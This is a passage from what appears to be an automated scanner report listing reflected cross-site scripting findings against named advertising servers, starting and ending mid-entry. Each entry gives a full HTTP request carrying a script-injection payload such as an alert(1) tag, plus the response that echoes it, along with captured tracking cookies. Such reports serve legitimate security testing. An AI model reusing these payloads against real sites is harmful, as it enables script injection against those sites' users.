00517050b6mlf17qk0000001o17090y63lg93og0000000o17090xvslebnns1wj3q01411000o5alggtq20000000b17090yyxlginvu0000000617060yywlginzk0000000317030x1jlebnns1wj3q01411000xwclginvd0000000817080o4plginvd0000000817080yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000b17090yyelginyj0000000417040fullf8gij0000001l170910f6lg1nei00000013170900c9lfk1rn0000001i17090y7blg94wv0000000m17090jsalggtq20000000b170906pklginvd0000000817080cajlfk1rn0000001i17090p7vlebnns1xgc001b120010tylg60ji0000000w170910ellg1nei07gla00h120010eklggtq20000000b17090xuklebnns2219101x170911k3lginvd00000008170810telg60j60000000y170910e9lg1nei0000001317090xtblggtq20000000b170910e2lggtq20000000b17090mivlgismk0000000117010yw4lggtq20000000b170910e4lginvd00000008170810e5lg1nei00000013170910rdlg1vir087mk01217090xt3lggtq20000000b17090mzklgcsh70000000h17090agalggtq20000000b17090agblggtq20000000b17090mzqlgcsgy0000000i17090loxlginvd00000008170807gmlebnns1wj3q01411000kfalginvd0000000817080xthlebnns1xgc001b12000xtflggtq20000000b17090za2lginvd0000000817080za1lginvd00000008170807gqlggtq20000000b17090ovwlginvd0000000817080lw4lginvd0000000817080fuqlegh2b0000001w17090lw3lggtq20000000b17090l24lginvd0000000817080mz1lebnns1wj3q01411000l25lggtq20000000b170907vglfk1rn0tn5601i17090jk7lebnns1wj3q01411000cbnlfk1rn0tn5601i17090e11lggwth0000000a1709; sglst=21k0s8dtlggrmr01w8m00c1709070c20c8kmlggrmr01w8m00c1709070c20cavtlggrmr0056q00c1709070c20c82hlebnns1ucve00z10000600200avjlggrmr01w8m00c1709070c20c3kilggrmr01w8m00c1709070c20calhlggrmr01w8m00c1709070c20c9bslggrmr01w8m00c1709070c20cab4lebnns2707l01x1709070v21481zlggrmr0056q00c1709070c20c8gxlggrmr0056q00c1709070c20c81ylginvd00000008170807082088gwlginvd0000000817080708208aoklggrmr0056q00c1709070c20caollginvd0000000817080708208b07lggwth01r1w00a1709070a20a7inlginvd00000008170807082088nclginvd0000000817080708208b05lggrmr01w8m00c1709070c20cal1lggrmr01w8m00c1709070c20cbbhlggrmr01w8m00c1709070c20c8wylginvd0000000817080708208b0clfjpei0yygv01j1709070v2148wxlggrmr0056q00c1709070c20c72slggtq201ywi00b1709070b20bahhlginvd00000008170807082088nblggrmr0056q00c1709070c20cahilggrmr0056q00c1709070c20c7gdlgcqt5061tf00j1709070j20jb08lfjpei0yygv01b1700070020040ulggrmr01w8m00c1709070c20caprlggrmr01w8m00c1709070c20c5l4lgcqt5061tf00j1709070j20jaanlebnns1xg0o00o120007002008aelggrmr0056q00c1709070c20c61hlggrmr01w8m00c1709070c20c5b0lf17qo0000001n1709070v214ag2leqh191sblb01u1709070v2143thlggrmr01w8m00c1709070c20c8c9lggrmr0056q00c1709070c20c9z4lggrmr01w8m00c1709070c20cacjlggrmr01w8m00c1709070c20cb1alfjpei0yygv01j1709070v2149mmlggrmr0056q00c1709070c20cb0nlggrmr01w8m00c1709070c20cb0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00c1709070c20c0tllegh2b22bk901w1709070v2149cblggrmr0056q00c1709070c20c8bglginvd00000008170807082084wmlggrmr01w8m00c1709070c20c5q8lebnns1ucve00k10000600200acelggrmr01w8m00c1709070c20c45mlfdxmc0000001k1709070v214bhdlginvd0000000817080708208

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16043w0t012e301OdygJLiOt01jvdp3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv29fgl01y18010801215; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Set-Cookie: orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Set-Cookie: rdrlst=43311gvlggtq20000000c18010ojdlggtq20000000c18010yujlginvd0000000918010x1blebnns1wj3q01411000e0flggrmr0000000d18010jv3lginvd0000000918010yielginvd0000000918010yiflginvd0000000918010oj6lggtq20000000c18010e08lggtq20000000c180110qflginvq0000000818010w3clebnns1wj3q01411000e0nlgevbm0000000f18010jv6lebnns1wj3q01411000jv5lggtq20000000c18010j4ilew2e20000001s18010khalggtq20000000c18011196lfzx0l0000001518011195lg7rdq0000000w18010jillebnns1wj3q01411001194lg3y5y0000001218010z14lggtq20000000c18010zgdlggtq20000000c18010faalggtq20000000c18010z13lgio080000000318011193lgiiin0000000a18011192lg5l2h0000001118010jprlginvd0000000918010w2klggtq20000000c18010yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001u18010mmnlebnns1wj3q01411000xwhlggtq20000000c18011004lginvd0000000918010z02lggtq20000000c18010kbzlggtq20000000c18010kkclggtq20000000c18010eh5lf17qf0000001q180106bylemlne0000001w18010df5lgcqt50000000k1801111xlggtq20000000c18010mn2lginvd0000000918010mn1lginvd0000000918010swvlggtq20000000c1801100plggtq20000000c18010im3lgcqt50000000k18010yzglginxj0000000618010b6mlf17qk0000001p18010y63lg93og0000000p18010xvslebnns1wj3q01411000o5alggtq20000000c18010yyxlginvu0000000718010yywlginzk0000000418010x1jlebnns1wj3q01411000xwclginvd0000000918010o4plginvd0000000918010yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000c18010yyelginyj0000000518010fullf8gij0000001m180110f6lg1nei00000014180100c9lfk1rn0000001j18010y7blg94wv0000000n18010jsalggtq20000000c180106pklginvd0000000918010cajlfk1rn0000001j18010p7vlebnns1xgc001b120010tylg60ji0000000x180110ellg1nei07gla00h120010eklggtq20000000c18010xuklebnns2219101y180111k3lginvd00000009180110telg60j60000000z180110e9lg1nei0000001418010xtblggtq20000000c180110e2lggtq20000000c18010mivlgismk0000000218010yw4lggtq20000000c180110e4lginvd00000009180110e5lg1nei00000014180110rdlg1vir087mk01318010xt3lggtq20000000c18010mzklgcsh70000000i18010agalggtq20000000c18010agblggtq20000000c18010mzqlgcsgy0000000j18010loxlginvd00000009180107gmlebnns1wj3q01411000kfalginvd0000000918010xthlebnns1xgc001b12000xtflggtq20000000c18010za2lginvd0000000918010za1lginvd0000000918010ovwlginvd00000009180107gqlggtq20000000c18010lw4lginvd0000000918010fuqlegh2b0000001x18010lw3lggtq20000000c18010mz1lebnns1wj3q01411000l24lginvd0000000918010l25lggtq20000000c180107vglfk1rn0tn5601j18010jk7lebnns1wj3q01411000cbnlfk1rn0tn5601j18010e11lggwth0000000b1801; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Set-Cookie: sglst=21l0s8dtlggrmr01w8m00d1801080120d8kmlggrmr01w8m00d1801080120davtlggrmr0056q00d1801080120d82hlebnns1ucve00z10000600200avjlggrmr01w8m00d1801080120d3kilggrmr01w8m00d1801080120dalhlggrmr01w8m00d1801080120d9bslggrmr01w8m00d1801080120dab4lebnns2707l01y1801080121581zlggrmr0056q00d1801080120d8gxlggrmr0056q00d1801080120d81ylginvd00000009180108012098gwlginvd0000000918010801209aoklggrmr0056q00d1801080120daollginvd0000000918010801209b07lggwth01r1w00b1801080120b8nclginvd00000009180108012097inlginvd0000000918010801209b05lggrmr01w8m00d1801080120dal1lggrmr01w8m00d1801080120d8wylginvd0000000918010801209bbhlggrmr01w8m00d1801080120d8wxlggrmr0056q00d1801080120db0clfjpei0yygv01k1801080121572slggtq2049eb00c1801080120cahhlginvd00000009180108012098nblggrmr0056q00d1801080120dahilggrmr0056q00d1801080120d7gdlgcqt508cb800k1801080120kb08lfjpei0yygv01b1700070020040ulggrmr01w8m00d1801080120daprlggrmr01w8m00d1801080120d5l4lgcqt508cb800k1801080120kaanlebnns1xg0o00o120007002008aelggrmr0056q00d1801080120d61hlggrmr01w8m00d1801080120d5b0lf17qo0000001o18010801215ag2leqh191um3401v180108012153thlggrmr01w8m00d1801080120d8c9lggrmr0056q00d1801080120d9z4lggrmr01w8m00d1801080120dacjlggrmr01w8m00d1801080120db1alfjpei0yygv01k180108012159mmlggrmr0056q00d1801080120db0nlggrmr01w8m00d1801080120db0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00d1801080120d4zqlgl34d00000001180108012019cblggrmr0056q00d1801080120d0tllegh2b24m2201x180108012155q8lebnns1ucve00k100006002004wmlggrmr01w8m00d1801080120d8bglginvd0000000918010801209acelggrmr01w8m00d1801080120d45mlfdxmc0000001l18010801215bhdlginvd0000000918010801209; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 14 Feb 2011 01:36:12 GMT
Content-Length: 827

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Media6/B3897970.7;sz=300x250;click0=http://ad.media6degrees.com/adserv/clk?tId=4071663510365101|cId=3210|cb=1297647330|notifyPort=8080|exId=19|tId=4071
...[SNIP]...
3br.net?anId=40&pubId=3099&advId=27355&campId=2946&vURL=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html37aa2"-alert(1)-"5ae84f10ba7";
</script>
...[SNIP]...

1.48. http://ad.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f3c3"><script>alert(1)</script>10dcb1064b2 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4f3c3"><script>alert(1)</script>10dcb1064b2 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=4thKjbT4Dd-wLmJ_EvL6OGUx_YihuVVYu3_TfrxVOxLfaqaDzVRu9ZiuBStYaftYPFbUXCL2UgT2Zh2i9n4bdmEFJK3PW8OZmgDnNcPWCfNI4E_LJGBd5ktc9D2EP3iXVzloyRtYmz5WwUlOqhgjJzRf6EtvPvPDy4qyJ60plhIiUcxVMkOk7W6GdnfN9Orwi4ny57OJZgTzL2FsqZrAh5fiWQZAKAOwRHx78cjQB8i-ExJ7_A4Q_x0WiDS5R8s4qPZYQ2rQpBVvfWWYpFe6URy2Vs2VdJ_TjWWvjLV9Q8m6hMviS8YTqb-ZiVtIUBjDzfzTwFruRQFMbT_NyCr5tmotZSQRzCZw0LF6c45BQQz09oHzZ-yryLJ8uFUm4TqTtHFDougM6qn-fCnFGGL4NPUNvmQnKSR_IW4vjpinnmSpjj2_u47YbamQM73IHCy9Sl0ZpaTYKgObLd08Gd0JoGuaLLHRZ-Ykz_TkIVZ9huoJ8VG9LN1TNKQM_NPsV2xeGHi3bYbGKGUdjPIU0cMPnGmxPU3XXT2arCgoL6Dn4SMbxfNR_y_fM9tMo0Ph6oeDvYYKlkyzNn3JdfPZgqqaIviA5QdTAVKvxsbfG_RiFigTLmpyQcn5PksmVWqu3SbN0VyR3eDASlHpj1bavPEOnrozydlNm_TE_r6icluVhvQE5Ov43rl2rHjKBgmJieXzPjWJq1kMte659Vcd5HhCaUJMqEVW9CddSG3ugiIvGpPb38PDFUA8hG6SKkVM5AiGw80gZu3yl7Vvk0bmhH4LCjjLMwDmJjRrWXjcO5EGZgy-ExJ7_A4Q_x0WiDS5R8s4BTpYXsHIzHlWqOeElAAexRy2Vs2VdJ_TjWWvjLV9Q8nWiYtrtggzf6QC_emGCUYHkAYZWo2P43mtp_vZfpxwURmMklWmLOsCWcBHbWrEHfnZfxRZofW-YLqIXc_XLzmrtHFDougM6qn-fCnFGGL4NAnCoYY7ACuNqpuJuqlD4PrpKdIl-vCs8PYIscXyY2wFHIA3ClafPQTXMYm0ZGX1lQ868DsJ8CzRL-qFZYXXGjnjVL9jGjuvVIAupi7jFNwmxmjWmZmvAOPnNuXsYJKsZcpAzSHYH88Cmpasf_VURFf22rMJNM9ndqYziU5Lic-QRj7a56PoySegU7HYB2c8HfiA5QdTAVKvxsbfG_RiFigezlWM8YZNRG9XfqIkin8k0VyR3eDASlHpj1bavPEOntPhusJqVFauiLy6UaFFc3PYmsvrCy4wt-d-LduEaGqhUO6VPDt67tRjGh2NpKtfx8Q-S6gpZovZHf4-kC6dIE7b38PDFUA8hG6SKkVM5AiG7G4qQXY8m01JE-wQyevARsbLIt6lxw4qn7zj9tJ2fQGJD8GhxX6KZrz-6lFiGJ-dRv8YUVgIig-grRaq4S8oT-Q_b1qUvkrI7hhBR8IjByfmHTKIVgzw0wJBikXj03WpHLZWzZV0n9ONZa-MtX1DyZl0YUseit0Cb3G_gMYpmfL9wJ-3B_7kL8dMqUjPBdPRS-kP3YQEvr7AqH2rw9rktoXdbV9sNJrU4cvKljWSeO20cUOi6Azqqf58KcUYYvg0eCIP4EeWu1tLqPD3KXyux9cg7-TCOBWwPvbOtAvH7FGTa5jgFaEbBx4OAtVXexdyPlxg9BhJfaBCNSYQ5Kq_-Sjtcg1-30-9Ex6CEY-Yr1gzbPQ4BjJufC2fQIZLJhJjTiug9ME9M3D4Hl8Eiw362GgMO-O5Hy-7BFA0JHw__mPd1M64cIluMfueZjPGlcvizzBrSDsidMXjw5kLBtnZH3sxbrc1XjPazF6bacT5OH5OfL6S5Ch8nYybd10IPcQ93hujX2-lUqQOZRz7lhE-Mp13Bx7SEoyCM4rv0PtWLZlDJuYINnvP4ltz0zwgi9RdBr-KLFRC4eQNwFThZDiSaEHYLoXdcf54MP-yW5BVHlvKRVBkBjUodw_dLB6IX2KDEvDFvZpoLKOIMM8vL4_UX54AJfo84MmNcJgucmF3a2rT3pH0CBj7HfwbEk4PHUhndSdvNmS_gGLRvueh6oi2M6aEMhx-btVOzA0hsRH2jLUVQcxEhmmaR_l3AS4SvhqrNqEcMkLIEPS56MjZCBdGPtsP2xTDqtDji7OeZPTeV4aXza8_gpDhhNfGv5kRzDqO8mTlK1zd_GN8J_C68v3vm6BzTfJiMvS8kl8QpS3DqrvGcnol-G-iOOCWmycV6dgRNwsJa0K7KBuioHn9OSA6OiovTKpiVvvksy9RWsNaBwlsK1sD2r9fBgo8cuHbz9o6Tiug9ME9M3D4Hl8Eiw362LLnvPdOAVRV_3-HFZurs-NwJI3B7sA3g7sDqxZPuDfgzzBrSDsidMXjw5kLBtnZH7oOoiCwaxJgx3v_OzDlP7JOfL6S5Ch8nYybd10IPcQ9X9Zc-e5Mnab9xws12uVaIR41EcKEDQON3vRYH1ZUr61GHZ56kCOvAMTmw-gDf-xHDkY3JWzdKEsukJ4BiXga1Q5GNyVs3ShLLpCeAYl4GtUORjclbN0oSy6QngGJeBrVn5kB8Bu8c7iHFAXgmGoiK5-ZAfAbvHO4hxQF4JhqIitAbIkJ3D687v0OZkfgvqhELnQlAE28n2DlyK7b-DFMmy50JQBNvJ9g5ciu2_gxTJuBUJX9pmSCLxiuzwYB86MTELbAFv_xsAvubJCJLlla0oa_uPyJAWAqD3ibcNxLhk9ZzfBU98RRGsiE7rLYAF7U0-lEpCQVO21AuaAn_6GWFjz7d-4JRCuozQQLfumpJSE1DAEFgyp5834TD56SR74-Gh_KZ4seqRyrSxDnYx6bbfvAdLEn8TgpYNDQOQBkNz_F4x9ydwRSyIlnBm5mjWTk2dsWUEe8YR0nRJ-RcjY4xKJY8_GDDsXZNc1xnOxIheEQaA4_4EDHKnfUnUEid2opeYGr2g6mjt8EkHand-oCrrsR_OIT6A1FqZldQLQBAfHRgcgF7FIdSZ5_87nT02pdOnckIzBPiMwCCKcMv-7LcniSJ_Z38uuHkYOliRcJOdbpoGbLCuvMNPg3cndaJwsK586AJWmQ44nwkhMoTIzPW2taqTWyyeGxhJe01tYYHhRwe50TGiQ4ayqZvxMwes0JcHudExokOGsqmb8TMHrNCYtqLln3rNkPy2fMYNItjb5p65N4NYIsxswLMnqfZzbqCZXHJ1GbJJRnbnm1mp0j6K931lLoYdbax2TZPhn7gigYHdiLIdqGJN4Fby-yTBP2ufYpAYQqKaBXZ3QHkktVEBQJcQBlsfrYmJhYACPhmlxrA0gThBUR_zElsqQPAsivSfXt6uuP7jvz9fgKyii_iYGj9voxAgcfPraiNme77-893dHG8TFoJbhrCrvd5u6DZXmYt3xjOemA4riPtg-VlcukHHk83m-gUQjwWqAerbhO6rTzKugJUqBqQ9F50l9JRxXHlVSYCTiFzrRayu0fCO6vLYbwbFb6diFeniXAnXYICxs_4rTchCin_F_gXJw3CAsbP-K03IQop_xf4FycNwgLGz_itNyEKKf8X-BcnDcICxs_4rTchCin_F_gXJw3SBYpq5h-OqNGCLdyjyYb4qyq4RHxj-sjEeXvEtPcPdY; fc=Q-i4UMc4QwIi-DRd9R6ia1J9_78D67FqFC0kV3tGd2QJJ7mWye14_2YpDYf2fGJzuDSye8dCcqjb55W88by2Y_lYn6WwWx8I_DeXmnM2x-jLDfaXqd7ordwJWxbMBXbCcEhYog6oHcMAxRPP4dyBk0paMt9KyzBYx_f8zOMt1_UkBxkTNTAXWm9kNSZlguLR5fjP49PUhu7v4L3sHsRyZQ; pf=W2lAvdO3UPK-67n93CR4V70h141EwRpVphJqTZeRapKuzdsXKOJykAJ3JxnPju9g5ehdKFP2wXAGuCUFv7XIPM0FzExGm1jv4Kvu640165OBvBXtoV0UQOpa27TXESVF-de5fP3AwoGiR_AIBPhToig1AM_gTSow1560pWbhh838I1Xi_FMkgIPwMPeBqodwgbWWL1_JBXWn8zgepH7BPbePalyqFZ93Lsfi8SgLVgTh-j-bH1npoySPlo-IWRvpNkaZBgGmnWJmvGYlVmPlSbHlSr1VTT1nlb50Fr5vj40NZDpqhun3lj0r0CvR0Vihm4m9vudXxCMFAjgeVFO5-xpIFGJioNw2vkEYe3YJ8emaUo3Hsp3jaymvGUlYuixmCOI3go4MrecUnPRzHm5YdxPKKY4kV-q2UJvSEkgnXksxeQb5A05wXSsD8Fj_F7za0NBQ4tKieMWx6gEN0MztGbK9Ye_wQX5bwuwz0ovjoTMcI4I2StnJ390lD_AvrOFoljQUjac8_W0UA2peA_VkfivKVPa-K620ApvhUtsRg48; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=15018%7C15018%7C15018%7C15018%7Cundefined%7C15018%7C15018%7C15018%7C15018%7C15018%7C15018%7C15018%7C14983%7C15018%7C15003; rv=1; uid=3011330574290390485

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sat, 13-Aug-2011 01:34:03 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:34:03 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=2383879606519371855&fpid=4f3c3"><script>alert(1)</script>10dcb1064b2&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.49. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adsonar.com
Path:	/adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 32ead<script>alert(1)</script>edf430560af was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1483549&pid=190076932ead<script>alert(1)</script>edf430560af&ps=-1&zw=228&zh=215&url=http%3A//www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html&v=5&dct=CPAC%20winners%20and%20losers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:02 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510

           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>


                                           java.lang.NumberFormatException: For input string: "190076932ead<script>alert(1)</script>edf430560af"


                                                           </head>
...[SNIP]...

1.50. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adsonar.com
Path:	/adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload aa72b--><script>alert(1)</script>56c01c56ac8 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1483549aa72b--><script>alert(1)</script>56c01c56ac8&pid=1900769&ps=-1&zw=228&zh=215&url=http%3A//www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html&v=5&dct=CPAC%20winners%20and%20losers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:00 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3234

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <script>alert(1)</script>56c01c56ac8" -->
...[SNIP]...

1.51. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adsonar.com
Path:	/adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 98ad8--><script>alert(1)</script>818648b6a was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1483549&pid=1900769&ps=-198ad8--><script>alert(1)</script>818648b6a&zw=228&zh=215&url=http%3A//www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html&v=5&dct=CPAC%20winners%20and%20losers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:05 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3667

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <script>alert(1)</script>818648b6a" -->
       <
...[SNIP]...

1.52. http://ads.adxpose.com/ads/ads.js [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adxpose.com
Path:	/ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 3feb5<script>alert(1)</script>2e70b7c5226 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=YpffvxtzOKuYhLCm_405295693feb5<script>alert(1)</script>2e70b7c5226 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0D346790CFB88D71D4593A30AB7CE8C9; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:37:09 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_YpffvxtzOKuYhLCm_405295693feb5<script>alert(1)</script>2e70b7c5226".replace(/[^\w\d]/g,""),"YpffvxtzOKuYhLCm_405295693feb5<script>
...[SNIP]...

1.53. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ea33"-alert(1)-"3b4b2d0d84c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1570312&9ea33"-alert(1)-"3b4b2d0d84c=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
